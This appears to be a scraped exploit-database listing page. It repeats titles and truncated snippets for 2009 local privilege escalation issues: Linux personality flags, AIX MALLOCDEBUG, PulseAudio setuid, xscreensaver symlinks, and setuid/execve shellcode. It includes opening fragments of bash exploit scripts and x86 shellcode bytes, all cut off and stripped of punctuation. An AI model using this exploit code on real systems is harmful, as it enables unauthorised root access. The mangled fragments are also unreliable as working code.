kernel: personality: fix PER_CLEAR_ON_SETID

The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...

IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability

No description provided by source. !/bin/bash \ / /| | | | \ | | | | | | \ | | | | | | \ \ | | \ | | | | \ | | \ \ | | | \ | |/ / |/ http://root-the.net + IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability + Refer : securitytracker.com/id?1022261 + Exploit : Affix [email protected] + Tested on...

IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability

Exploit for aix platform in category local exploits ========================================================= IBM AIX 5.3 libc MALLOCDEBUG File Overwrite Vulnerability ========================================================= !/bin/bash + IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability +...

Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : linux, linux-source-2.6.15 vulnerabilities (USN-807-1)

Michael Tokarev discovered that the RTL8169 network driver did not correctly validate buffer sizes. A remote attacker on the local network could send specially crafted traffic that would crash the system or potentially grant elevated privileges. CVE-2009-1389 Julien Tinnes and Tavis Ormandy...

USN-807-1: Linux kernel vulnerabilities

Michael Tokarev discovered that the RTL8169 network driver did not correctly validate buffer sizes. A remote attacker on the local network could send specially crafted traffic that would crash the system or potentially grant elevated privileges. CVE-2009-1389 Julien Tinnes and Tavis Ormandy...

PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)

Exploit for linux platform in category local exploits ===================================================================== PulseAudio setuid Priv. Escalation Exploit ubu/9.04slack/12.2.0 ===================================================================== PulseAudio setuid Local Privilege...

PulseAudio setuid - Local Privilege Escalation

!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...

PulseAudio setuid - Local Privilege Escalation

PulseAudio setuid - Local Privilege Escalation !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include...

PulseAudio setuid Local Privilege Escalation Exploit

No description provided by source. !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c EOF include stdio.h...

PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)

No description provided by source. PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp or change config.h. Must be on same fs as the...

Pulse Audio setuid Privilege Escalation

!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...

GLSA-200907-13 : PulseAudio: Local privilege escalation

The remote host is affected by the vulnerability described in GLSA-200907-13 PulseAudio: Local privilege escalation Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself...

Null pointer dereference

The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...

CVE-2009-1895

The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...

xscreensaver 5.01 - Arbitrary File Disclosure Symlink

xscreensaver 5.01 - Arbitrary File Disclosure Symlink xscreensaver local arbitrary file disclosure | symlink attack The �xscreensaver� program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on...

xscreensaver 5.01 - Arbitrary File Disclosure Symlink

xscreensaver local arbitrary file disclosure | symlink attack The �xscreensaver� program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver...

xscreensaver Symlink Attack

xscreensaver local arbitrary file disclosure | symlink attack The ´xscreensaver´ program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver program...

Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)

Linux/x86 - setuid0 + execve/bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...

Linux/x86 - Disable Shadowing Shellcode (42 bytes)

Linux/x86 - Disable Shadowing Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...

Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)

Linux/x86 - setuid0 + setgid0 + execve/bin/sh,/bin/sh,NULL Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80...